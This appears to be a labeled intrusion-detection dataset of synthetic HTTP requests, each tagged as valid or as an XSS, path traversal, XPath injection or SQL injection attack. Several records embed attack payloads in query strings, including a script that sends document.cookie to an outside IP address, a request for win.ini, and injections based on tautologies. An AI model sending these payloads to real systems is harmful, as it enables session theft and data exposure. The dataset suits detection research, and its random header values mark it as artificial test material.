Upgrade: dje8H/7.3, tQi/4.9
Warning: 386 22.153.125.167 "t5eh" "Thu, 23 Jun 05 10:04:46 GMT"
X-Forwarded-For: 118.223.215.97
X-Serial-Number: 413846033760672
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 9234
Start - Id: 47470
class: XSS
GET /Cv/91/uFq06qWGD7RBA3/bRwwxFdJr5gLYh-vpVOk/ioz@dAjG24h3V/n9wjjFXiLGYNm0XOXnC/rw/3pVDe6TbQ3TIShQ.shtml?adrSee=gasock_streamnH&t6ai1g=nntynli&ArxY=home&TO=63712199&eler=%26%3Cscript%3E%5Bwindow.open%28%27http%3A%2F%2F192.196.118.153%2Ftrerta.mdb%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E&ne=nVBA&hhtRiaq2c7ufx=88814063 HTTP/1.0
Host: 137.72.199.126
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: on-9toll;q=0.0
Cache-Control: only-if-cached
Client-ip: 227.166.219.20
Cookie: onw=nph-hWsamU3tlmnullMjadmin;PntqHbStmpEINH=Ob=i;harteh=8939
Cookie2: $Version="37"
Date: Thu, 10 Jun 04 06:15:25 GMT
ETag: "AGbD10fcZavK4XS"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Wed, 11 Oct 06 07:18:41 GMT
If-Unmodified-Since: Fri, 06 Nov 09 01:41:20 UTC
If-Match: "3eXoRSl5GT93ni8yWEPI"
If-None-Match: *
If-Range: Wed, 07 May 08 07:22:11 UTC
Max-Forwards: 20
MIME-Version: 5.1
Pragma: t1=pErxstk
Proxy-Authorization: ohttg htuneE=et8ju
Authorization: Digest algorithm=MD5-sess
Range: 1-845224,09-
Referer: /airsad/fhvtAex/madaMo/8oanSha9/ctioSoag.rar
TE: trailers,trailers,gzip;q=0.0
Trailer: From
User-Agent: tiNyfif (evCgQuhBf; ri2iOwQV)
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4671x382
Via: 8.4 128.0.194.210
Transfer-Encoding: inr33
Upgrade: rshhh0/1.3
Warning: 434 www.stheqS.htm "2se9l4zCow3t" "Tue, 16 Nov 04 07:44:37 CET"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47470
Start - Id: 45614
class: PathTransversal
GET /5P/f0W6/8fBkt5Nv9rGttae/3location-XechoWstdinlqnK/RJR/ptI@d53moDvl@I8K/srCslXiH4CO1PvDT/yAH98RBDdropiLyKh/li6t1istnies/idTMMlsKeEQgg.asp?rgsLmau=96975&gSwhbinPyH=t%3A%5C%5CWINNT%5C%5Cwin.ini&en5m=tro5gtthNtsnq3eo&snfrot=ev&q0fGvk5T18p=srrrahncahloos&tarsartpeeN3=Toarotdmit HTTP/1.0
Host: www.dohhrgp.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.3, compress, compress, gzip
Accept-Language: *
Cache-Control: max-age=05
Client-ip: 54.187.183.145
Cookie: Hnteosrr15tit=eUeGe-;E4JM3ZchildXOX=Brz1ei47m7;1DhPm9c.fl=oMW;en1=aornda0sni;eshtTv=lh1
Cookie2: $Version="41"
Date: Sun, 15 Feb 04 12:48:28 GMT
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: 100-continue
From: aieelt@lnoh1ttGc.st
If-Modified-Since: Thu, 08 Apr 10 03:22:33 CET
If-Unmodified-Since: Thu, 22 Sep 05 19:46:12 GMT
If-Match: "vm_nGXpx3o3hqPQre667"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 4.5
Pragma: wia='eLi8'
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Basic MnJzZW9zcjpOZW4yZWQ=
Range: 942-,71595-5
Referer: http://Anpt.net/abLcroO/2iehnwd/Cbra.gif
TE: gzip,deflate
Trailer: Accept-Language
User-Agent: Eag2ttaeanta
UA-CPU: x86
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: 5.4 96.107.199.90
Transfer-Encoding: eiSs
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45614
Start - Id: 15294
class: Valid
GET /rNE2htwl-EIIj63/cUt0vJFarxkZDYwE8ml/ohbqf7cng/2ireva/rvJ/osayid/nsiozrtnu/wT27IfSPSHD3DETLFfD/le/sPf.KSN3vSpb-cyyDg/srJrhet/rjFOKIK06ZI-shedc.pl?e4oglTok=gavpdlpw2heeo1&Hd@DzLJPg=suy2vZEyXnk-&ligslEbAtav=6682&pBiW92eeN=24&wtiar4jp=248783170 HTTP/1.0
Host: 182.46.32.40
Connection: close
Accept: */*
Accept-Charset: utf-7;q=0.5, iso-8859-1;q=0.1, x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 92.112.2.184
Cookie: kecesBrnsgt=3411394;bEwooa9ee=tfdotgs1
Cookie2: $Version="2"
Date: Sun, 10 Sep 06 07:08:05 UTC
ETag: "eyEDedkQLRzP76QO1Y"
Expect: 100-continue
From: sbR2u@rgtt.st
If-Modified-Since: Sat, 04 Dec 04 08:08:19 UTC
If-Unmodified-Since: Wed, 17 Dec 08 21:41:54 UTC
If-Match: "cHUotYQeAyVH9M5"
If-None-Match: *
If-Range: Thu, 05 Apr 07 09:29:19 CET
Max-Forwards: 7516
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="rtaas7"
Authorization: NTLM T3l3cHRjYm9uZW91dG5kNUE5RXhlaUxhYzJlZWg4bmZuNm4=
Range: -0,247-43132,14-73
Referer: http://www.1nueg.gov/T9cdox/Rdftang1/reicdR6.gif
TE: trailers,chunked,chunked
Trailer: Upgrade
User-Agent: Mozilla/3.8 (Machintosh; U; PPC Mac OS X 6.5; nb-hm; rv:5.9.2) Gecko/34641327
UA-CPU: 68000
UA-Disp: 331,6855,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9424x098
Via: 3.1 128.253.254.16, HTTP/4.6 www.htfo.htm, 4.3 www.eeec0.jpg
Transfer-Encoding: gzip
Upgrade: hfypo3/8.4, oeoo/3.1, IskcE/6.7, mdredh/7.9, fmaid/9.9
Warning: 138 www.AisaedTu.png "eyiwdeehii" "Thu, 16 Feb 06 14:40:29 UTC"
X-Forwarded-For: 181.70.199.85
X-Serial-Number: 193733514519780157
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15294
Start - Id: 49045
class: XPathInjection
GET /r97lds8wre/tFW9OjlHftXnDM5/laao/Sttitounlisgyc5g/zASKd8RGqyI@dO7N/swM@NC6xz@/biZ/zt.jpeg?trkanodaxi=sy0+all+-d&lft=hwen5a1nokIrnep&ttdeco7maqL=peel%27+++++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or++++%27ddTrdsrt%27+%3D++++%27&ryidhEoseBr=9898562 HTTP/1.0
Host: 173.71.88.122:14629
Connection: keep-alive
Accept: image/*;q=0.0, text/plain;q=0.6
Accept-Charset: x-mac-hebrew;q=0.6, iso-8859-9
Accept-Encoding: compress
Accept-Language: *;q=0.4
Cache-Control: max-age=282
Client-ip: 23.215.109.9
Cookie: iuers9a= 2e4l[qddtmn-r;2lefaennug4g=l9RL4tnHt.;Ruanj6g2Z=ejiio2atnsmbweer;1OfY37s=nMo ae2snmzxr;elctshyaeioseDr=nhYt;aentpbzemtiN=h rkos+>chtO3%terl8
Cookie2: $Version="1"
Date: Mon, 05 Dec 05 03:02:02 GMT
ETag: "r-Z6weivO3zk7qcN"
Expect: 100-continue
From: omlrams@dneneIeea.de
If-Modified-Since: Wed, 24 Sep 08 13:36:31 UTC
If-Unmodified-Since: Sat, 12 Aug 06 21:06:16 CET
If-Match: "ILl1IhokyDW1cPI"
If-None-Match: "fxauJTjPJedHzYc"
If-Range: Tue, 23 Jun 09 05:26:09 CET
Max-Forwards: 3681
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest realm
Range: -31
Referer: /tgse/rpdnuAse/oestna.aspx
TE: deflate,gzip
Trailer: Referer
User-Agent: Mozilla/9.3 (Windows; U; WinNT 4.7; is-or; rv:3.6.9) Gecko/14131434
UA-CPU: StrongARM
UA-Disp: 792,0293,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1840x9062
Via: HTTP/5.3 www.tpreaxd6.css, FTP/6.0 www.vo51hnn.jpg
Transfer-Encoding: compress
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 398 210.174.40.66 "iaesbh" 
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49045
Start - Id: 18097
class: Valid
GET /VhyydqaEioascaei9r/NawhenrasaOtrtuo/mrm/kL9-tL0mS1/iS74mq/ieS2hk6V9B.nsf?yevt6xhN3sasa=S&Vfay7q0eaiea4=ivhho7uaeneR&ta=a&aAco5eSeghj=2&asOdidege=161490&lsdYmnndmzlSd=ae%3Bklai+Zs&cunf=tidp+update&ii5r7=A+&ettn2Ro=5&a7gt6ST4=55387318&gea5th=jrh7aia%2Ber&QopenCRWznZe=e%26AsN%5B8h%29andt&sic6eekwv=6 HTTP/1.0
Host: www.htshe.be
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936, macintosh;q=0.0
Accept-Encoding: 
Accept-Language: ashn-1o;q=0.5, nAheuI-a, roed-yrtmnur;q=0.9
Cache-Control: only-if-cached
Client-ip: 14.203.190.107
Cookie: fQEzd=yypiikp;2t=88476871;asabedjavsbbm= yltch  <us9
Cookie2: $Version="1"
Date: Sat, 04 Jun 05 07:47:43 CET
ETag: W/"eHmW0mNcEda-3Z5u"
Expect: bncE=f0e5mD0;gaimk
From: oecjtte@aJits.ch
If-Modified-Since: Sun, 02 May 10 01:03:37 UTC
If-Unmodified-Since: Mon, 13 Jul 09 06:32:37 UTC
If-Match: "eBPLIFkt@2N1IzqM0Wc"
If-None-Match: *
If-Range: *
Max-Forwards: 398
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic YWhnZGE6bmlpN1R0
Authorization: enwu 4er2Is=oenp
Range: -0327
Referer: /dhcr/8eeoleta/aeeeialr/nemt4/csrhn5.exe
TE: chunked;q=0.6,trailers
Trailer: Accept-Encoding
User-Agent: nbL2codMsht
UA-CPU: MIPS
UA-Disp: 401,696,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 022x8341
Via: 7.2 www.satgenc.htm, 5.0 22.98.44.151, FTP/6.1 www.qshrRei.tiff
Transfer-Encoding: gzip
Upgrade: triedg/0.8, sgneu/3.4, 95rs/2.7, tqU/0.4, shfsat/8.7
Warning: 504 www.jecaa.jpg "whtdsrErtaeai" "Sun, 11 Sep 05 02:40:23 GMT"
X-Forwarded-For: 22.251.252.232
X-Serial-Number: 0963814403346136
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18097
Start - Id: 7871
class: Valid
POST /nptlh/fKb97NAoNFF@EG/emorl9rJnsheat1f/tnaEecagiu9/dropddropMJKidUlogtW/noDaisahelv/1L3e/e6DyMXMaoShMK1T/X1sc58.cfm? HTTP/1.1
Content-Length: 93
Content-Language: oa5sahyg,huepn,rrtleari
Content-Encoding: compress
Content-Location: /sptE/oenbu/hhmre/aHrdo/plktu.sh
Content-MD5: SW96bGdjdDJFMllzbnByZg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Jul 08 18:34:00 CET
Last-Modified: Tue, 17 Jun 08 13:46:58 GMT
Host: www.Yxxro.org
Connection: r767e
Accept: */*;q=0.1
Accept-Charset: iso-8859-9
Accept-Encoding: gzip;q=0.9, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 36.61.64.56
Cookie: boehotybesm=rU;0krtozlyhno3=7206155310;atbcb4=0043587
Cookie2: $Version="163"
Date: Sun, 16 May 04 23:13:04 CET
ETag: "gt.BekdWvPCC0T.gdmg"
Expect: 100-continue
From: Oosa@iedncd.ch
If-Modified-Since: Tue, 31 Oct 06 16:58:12 UTC
If-Unmodified-Since: Fri, 07 Dec 07 06:09:13 GMT
If-Match: *
If-None-Match: "0jLQL9EZo2EBSE8aAa7a"
If-Range: "eBjFJRJzgp4fFud9Mc."
Max-Forwards: 8893
MIME-Version: 5.8
Pragma: r3s8ceeo=5os1yw
Proxy-Authorization: Digest username="wNlbos"
Authorization: Basic cHRpYTpzaThnY2Vh
Range: 3-90,72191-
Referer: http://tueio.be/hcemM/ohtnf.tiff
TE: trailers,gzip;q=0.0,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.4 (Windows; U; Win98 0.6; A2-sa; rv:5.1.4) Gecko/42656266
UA-CPU: Sparc
UA-Disp: 8149,736,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 078x656
Via: FTP/8.1 www.nQcaneee.htm, 9.9 169.49.93.87
Transfer-Encoding: compress
Upgrade: zo0jhs/9.3, IJs3au/5.6, dAmeer/2.8
Warning: 457 58.248.149.253 "ghot6raooeReo" 
X-Forwarded-For: 205.233.18.56
X-Serial-Number: 625088294062
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wtseolEjsenA=928176&hGbodyPWJgHR=esi|tMbruN=dall&ntijgh8siatitel=39341304&se9mshast=63350

End - Id: 7871
Start - Id: 30963
class: Valid
GET /sLGc/0j/oy_6pV/g2/nP.-IRE.y/wy1XuHiQ/01x.pl?aqtsme0N7ha=590059&tsaaaw6=ncaAE7&eh6h=27083051&ot=ee2LahOa8noa10&tEeee=f8Zt5UeX_&qerte0ejeiie=htoncdoppbltyywn0&lr3k-M=sA8ggtt&fetzrky5Js=40526&aqo8tSemdi=usLp&K2linkXdNz=ienetrcp5Lsoy+o5di&Efn=23ruhee&emddi=ephhi&zotCnaesmn=w.u0yNhpz&qmtikodtiqvafts=48835431 HTTP/1.1
Host: www.gimea.ch
Connection: ppo0x8
Accept: image/*, text/*;q=0.7, text/*
Accept-Charset: hz-gb-2312;q=0.6, iso-8859-6
Accept-Encoding: identity;q=0.4
Accept-Language: *;q=0.7
Cache-Control: min-fresh=520
Client-ip: 99.179.87.18
Cookie: rghe8e=8;e5r5hvmnastalcs=68472
Cookie2: $Version="654"
Date: Fri, 26 Jun 09 06:13:54 CET
ETag: "5e_Nr_S.RrEhzGj7@IRz"
Expect: 2eSsm=bahsd;la4Rzej
From: 2teoy3o@9tooecavin.be
If-Modified-Since: Mon, 26 Jun 06 17:53:41 UTC
If-Unmodified-Since: Fri, 05 Aug 05 22:45:15 UTC
If-Match: "Vhmyt@c4bmH@m7@ai3"
If-None-Match: *
If-Range: Sat, 28 Mar 09 16:20:24 CET
Max-Forwards: 5
MIME-Version: 2.1
Pragma: hlmi=aeOhorne
Proxy-Authorization: Basic cmdvMGVhdDpnNWh1bzFyZg==
Authorization: Basic cmZyc2VocjppZXJlYQ==
Range: -73
Referer: http://www.oge8aa4.gov/wrpAEU/lxaaz/lgL4of/fst1sIer/c7ue7ntp.html
TE: trailers,deflate,chunked
Trailer: Trailer
User-Agent: ueeaooaHeoarioekee
UA-CPU: PowerPC
UA-Disp: 6522,303,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 206x306
Via: 6.3 72.175.164.104:6, 9.4 www.manrjJ.shtml
Transfer-Encoding: gzip
Upgrade: ehia/0.0, eN7b/7.6
Warning: 912 www.svdVuoCG.jpg "fhodof" "Sat, 09 May 09 20:18:55 CET"
X-Forwarded-For: 19.38.156.93
X-Serial-Number: 17732280940641123
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30963
Start - Id: 32590
class: Valid
PUT /hu9NNP4nu3/oGevpFeSTXpWqgw/eso81toai/arEO99UuvYQ9Mw/iwsceCki/hnxntk8ngslrmo.js? HTTP/1.0
Content-Length: 65
Content-Language: tIhj,m,ono
Content-Encoding: deflate
Content-Location: /Sbioed/ehehT/th3ot/bktibc/vmr7psyi.shtml
Content-MD5: cGZ0SHJqdG55c2NrQXJpbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Mar 10 19:38:19 CET
Last-Modified: Sun, 13 Apr 08 11:15:52 GMT
Host: 198.227.10.175
Connection: yeOeNu
Accept: */*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.0, identity, gzip, compress, compress;q=0.3
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 87.137.200.16
Cookie: WVvkd=496;senei9oCts=&shutdownzAstmW;ncer7oua6jemzep=xailocationyem 6Efn5bn<eutmp
Cookie2: $Version="27"
Date: Thu, 11 Jun 09 05:37:44 UTC
ETag: "lYsE4UvE6HaItzCeVZ"
Expect: 6exi=cgahot
If-Modified-Since: Tue, 07 Dec 04 17:41:31 UTC
If-Unmodified-Since: Thu, 17 Jul 08 02:14:52 UTC
If-Match: *
If-None-Match: "zP7e.c@sfzoG7Kk"
If-Range: Sun, 18 Dec 05 16:40:18 CET
Max-Forwards: 8171
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: ttuo3 keteeat=beezene1
Authorization: Digest username="erqbtas"
Range: -619576,782-7
Referer: /usntthaJ/feeis4hu.pdf
TE: trailers,deflate;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/2.1 (Machintosh; U; PPC Mac OS X 2.1; ay-qr; rv:4.1.6) Gecko/23563121
UA-CPU: Sparc
UA-Disp: 282,0738,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 744x9728
Via: 5.1 www.eqabet.html, 5.1 193.69.55.18
Transfer-Encoding: deflate
Upgrade: fim4i/1.8, mvMta/2.8, jo9ve/6.8
Warning: 560 61.58.173.87 "aNahir0tmoon5em" 
X-Forwarded-For: 64.19.200.199
X-Serial-Number: 34552
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

uqlced25Nu=ccdpassthruoitocf&eio6s=rvoi0ixhmhmddeoret&tlsnr=93368

End - Id: 32590
Start - Id: 47051
class: XSS
GET /ucrtaeAak/ayt3Salissh3fefas/evSSGQHKg@gEbH6e.aR/leneypaJs2ncszeiyel/istsEttnostala0pe/7LbetweenoS1/iMnPxterm.tiff?Ieee=O6%22++%3E%3Cbody%2520onload%3Dalert++%28document.cookie%29%3B++++%3E HTTP/1.0
Host: 212.135.244.238
Connection: close
Accept: */*;q=0.0
Accept-Charset: windows-1253, euc-tw
Accept-Encoding: identity;q=0.1, deflate;q=0.9, gzip, identity, compress
Accept-Language: smCes-iEtlm;q=0.6, 4ttice-lxde, utetaewh-3Ro, oe-I, aer-n;q=0.5
Cache-Control: only-if-cached
Client-ip: 66.107.218.203
Cookie: adtoiepostWr=u9dhnnae;Itsge=%\;dgmiDiee=l-miHwujVBe;Onstn=46;xA=9399
Cookie2: $Version="71"
Date: Fri, 13 Feb 04 11:07:21 UTC
ETag: "v3TftZeHd8EU2vMvbiP"
Expect: 100-continue
From: hhas5f@maUt8ekaSt.biz
If-Modified-Since: Sat, 16 Jan 10 13:50:59 UTC
If-Unmodified-Since: Mon, 22 Aug 05 02:50:01 GMT
If-Match: "qBlIDkEWsqd1WmopfuOI"
If-None-Match: "HlvHJeL3e74XTBHap"
If-Range: *
Max-Forwards: 76
MIME-Version: 1.7
Pragma: emedlm='o5mawtn'
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: Digest nc=39Ce4CfC
Range: 388869-790680,430-,-04157
Referer: http://nc2r.fr/iifoorui/T1iil/ksie/otoas/s4rtp.mdb
TE: deflate;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.8 (X11; U; Linux i586 0.4; ea-aj; rv:9.3.6) Gecko/39365476
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 987x1282
Via: 3.1 130.185.200.45, 8.4 www.y1ssws.htm, 4.9 107.177.178.240
Transfer-Encoding: deflate
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 964 245.225.40.21:93731 "csa6ao3oxtd9hnfoert" "Tue, 16 Nov 04 02:10:40 CET"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 9140776636485
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47051
Start - Id: 15253
class: Valid
GET /Gb/sp4eeen6Blis/PwYXfbinhbodyupdate/XL0xmlgP_qH7GzscriptB/Ilmfio2t3n/gTJx/tA4VsbtAMWiK1/n16.css?gte3r=cVaewhW7ea&firxemot9=5&hyef=1&bgsound0mn=s3anqlEY&UMFl8@9CRg=uGy2OjKs0NdJ&sh=755&j9qGIf=aN3UFnevn&Hiereucssnlp=foddwvutreu5swwiu&8njSnsfoo3=ees5be3i HTTP/1.1
Host: www.lueee.ch
Connection: mlea
Accept: */*
Accept-Charset: x-mac-arabic, iso-8859-2, x-mac-japanese;q=0.8, x-mac-ce;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 185.107.95.225
Cookie: OdropRoFTstdinB=uiZXs8tAq2fa;nsbisSkny=5;ne93uge9Oi=tLNOC042yJ;yDlink4winnt=enseeTa5o?>g;pl=6666
Cookie2: $Version="9"
Date: Thu, 18 Jun 09 02:12:15 CET
ETag: W/"@PQZwevERhTi5Cop"
Expect: 8oNm=hcoe0
From: aecg@hens.de
If-Modified-Since: Sun, 29 Mar 09 23:05:59 UTC
If-Unmodified-Since: Sat, 18 Dec 04 14:39:32 UTC
If-Match: *
If-None-Match: "I6G1xJTkpdqwky@"
If-Range: Thu, 27 Dec 07 19:44:39 GMT
Max-Forwards: 415
MIME-Version: 3.7
Pragma: itaal='eHsa5c'
Proxy-Authorization: vt6o Ret2w3r=bHEdy
Authorization: Basic enNzT2kzOlRvbGVhdGc=
Range: 70862-
Referer: http://www.0cthk.uk/mn7a.sh
TE: deflate;q=0.1
Trailer: Accept-Encoding
User-Agent: rtiau/5.3.2.8.3
UA-CPU: Sparc
UA-Disp: 8420,749,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 175x9558
Via: 4.2 83.11.180.95:7694, 1.1 208.58.116.179, 5.5 www.eougxye.jpeg:03
Transfer-Encoding: deflate
Upgrade: 3mbtt/4.9, e4asi/7.0
Warning: 629 www.ecbma.htm "smrFi67hp6Oamp" 
X-Forwarded-For: 231.138.207.226
X-Serial-Number: 82459741903687
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15253
Start - Id: 49063
class: XPathInjection
GET /ott2rchhmeic/ieHjpF9EO83Syv/v7fue6/9ABdn7si/lsp32BIA6mA/mN4NN_ROCW5EMA/8Xj@QeweP3/htemarhi1h/F@6/m.sZQmSGcpI.asmx?intU6aa0=anb%2F0ye%2FN%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D60%5D+%7C++i%2Fmpife%2FtDee%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D531%5D+++++or+++++%27umtdpr%27++++%3D++++%27&lZ9mtEo=out5odfh HTTP/1.0
Host: www.Seeremsl.fr:577
Connection: keep-alive
Accept: application/zip, video/*;q=0.8, video/*;q=0.7
Accept-Charset: isiri-3342, x-mac-icelandic;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 164.173.183.167
Cookie: 6ynto3d4=W l-eN;g8NaG_fFWand0@=nrudnoon;dYPKU=%e'%=roteia t gqniwp-;awnno=258584
Cookie2: $Version="84"
Date: Wed, 20 Jan 10 10:59:07 GMT
ETag: W/"bj@Q8.9F_UsS-HtPu"
Expect: I3umu=lic0is
From: oT4sie@pMej.gov
If-Modified-Since: Sat, 10 Apr 04 06:18:55 CET
If-Unmodified-Since: Sun, 04 Apr 10 15:25:35 UTC
If-Match: "qk.OLolgoCa@E-cV"
If-None-Match: "tVEDm1DEek3CZXbowu"
If-Range: "8WcuBMDm2pIipGgVD"
Max-Forwards: 2
MIME-Version: 0.7
Pragma: g74i=9ai
Proxy-Authorization: NTLM Y3FhZWFobWFmYW5BaGRlZHRlb3Jhc2xhZTluR2xEdmxkVWNuaEl0ZW92cw==
Authorization: Basic OWhpZDphd3RocGVhNQ==
Range: -4,-1070,-459610
Referer: http://olHitme.it/f6maubi/fistmNz.ace
TE: chunked,deflate;q=0.8
Trailer: Accept-Charset
User-Agent: f9x_VfS http://www.ahsrcao.it
UA-CPU: x86
UA-Disp: 470,303,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7313x7197
Via: 3.6 www.hc9Ts0s.png, tE8y/3.7 140.173.241.5, 6.5 www.napE.jpg
Transfer-Encoding: qahhra
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 127359011518288
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49063
Start - Id: 18974
class: Valid
GET /hPszj@Q9hVeX.O4Ni/oNCi85bs0t/rinputa/eOIXLpWyDyEY/lGExL@6xP4nyo/antdcehn/efWUQzZS5THgGyxox/bVWEjX/l@M-D8/k8G/OI.htm?aeo8t=+%3Ee6m&6atiemry=yip4fresrhoikgo&havingKL2oW-=l5Q.T00&1abdwezhtdhos=o50Bapbm&wroc=ero%3Cer%28&uf=+cc+%3D&glezhyd7heoygbs=u2tqGKxnrh%40&ZOj7Ci4d7=betweenCNIfen HTTP/1.0
Host: 254.69.77.11
Connection: o3Es
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Ae-njAtRe;q=0.6, h91r2-ydjca7z;q=0.9
Cache-Control: el1b3=e
Client-ip: 233.32.130.113
Cookie: nsptr=e;1UIobjectpJx8ZOy=nuoeaa6;dtirchgz=hdcQbjtdIt;0m7a=enYjed6LCe/eE;ottEa0smNRrLao5=s4Dmctmp;PZsdapngetrTi0=ledkE.B
Cookie2: $Version="5"
Date: Wed, 07 Jul 04 07:58:39 GMT
ETag: "pKJXOgSIwdASDn5RBmBa"
Expect: snhsa=sroukt;UaSeee
From: l14gyjst@isddra.be
If-Modified-Since: Thu, 25 Jun 09 05:47:47 UTC
If-Unmodified-Since: Sun, 18 Jun 06 10:20:05 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Apr 04 19:10:51 GMT
Max-Forwards: 33
MIME-Version: 9.9
Pragma: ehieabte='1riimvt'
Proxy-Authorization: NTLM a1RjaG9ib2pudDZvdGpDUjRhYWl4cnBpZWVydGtlc3Uz
Authorization: NTLM cnllYW05Z3RycE50eXQzYlVhUHBSTnNzb3BwbmJyZGV0d255ZXRzZWdObnRzbDFy
Range: 63-4,19-3,96935-
Referer: /aCoe/s24tDott/2fit/olsres.tar
TE: gzip;q=0.9,trailers,chunked;q=0.0
Trailer: Accept-Encoding
User-Agent: Mozilla/9.1 (compatible; titads; SunOS sun4u; lrhoprtt; otlk7lode4; 5Iadrshoie)
UA-CPU: 68000
UA-Disp: 2989,0086,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 378x534
Via: HTTP/2.5 www.binc.png:340
Transfer-Encoding: deflate
Upgrade: tre/5.6, eMW/5.6, erle/4.7
Warning: 319 www.seEeeme.shtml:62 "entaH6oantt2mash" 
X-Forwarded-For: 166.105.2.220
X-Serial-Number: 27260320301
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18974
Start - Id: 41892
class: SqlInjection
GET /eltf/aHTFTIF9PPnpoho/oidw3eb0rft/tCx.24/e4ece/o8n841snrwVi/rrx3C8Gtkwzl.swf?mf=10&buoericor5l=708838190&0_ZVjQpQ8I=ma7Sab15rLtaeh2&sltae=g1dsws%2Fsohe&ush15n=Be8uuewinnttmXt&yalro=230&niaieohyrsof7=sUajj07F&eL=kiscript&ohcma=ibE%27ntupdateetnac7axmlleg&enAA=%27+++++OR+%27ealh28hoo00s%27++LIKE++++%27aze%2525 HTTP/1.1
Host: www.Otjeiied.gov:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eTe8w-eaj7slAt, 8l-holhDuws, nia-tf, eetybee-tarte3o;q=0.2, aE0o-9ttblpO7
Cache-Control: no-transform
Client-ip: 143.204.36.23
Cookie: tnCbr4n7ATar= rleId;NlOhdOnp=933;e4p=4052951520
Cookie2: $Version="81"
Date: Wed, 16 Feb 05 13:40:48 CET
ETag: "yzSqUXzQ3vrwUR.K@"
Expect: 100-continue
From: elee@hieitj.de
If-Modified-Since: Thu, 18 Nov 04 14:22:53 UTC
If-Unmodified-Since: Fri, 25 May 07 04:11:56 UTC
If-Match: "EUjR03G55pIl1cxiq"
If-None-Match: *
If-Range: Thu, 25 Jan 07 23:32:38 UTC
